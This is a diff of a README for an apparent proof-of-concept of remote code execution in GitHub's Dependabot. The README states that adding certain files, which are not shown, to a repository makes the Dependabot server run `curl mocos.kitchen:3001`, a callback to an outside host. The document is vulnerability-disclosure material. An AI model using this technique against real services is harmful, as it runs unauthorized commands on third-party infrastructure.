tyage/dependabot-test3/README.md

 # PoC for dependabot RCE

-Add following files to your GitHub repository and `curl mocos.kitchen:3001` will be executed in dependabot server You can see your dependabot result from `https://github.com/<USER>/<REPO>/network/updates`.
+Add following files to your GitHub repository then `curl mocos.kitchen:3001` will be executed in dependabot server.

+You can see your dependabot result from `https://github.com/<USER>/<REPO>/network/updates`.

 `package.json`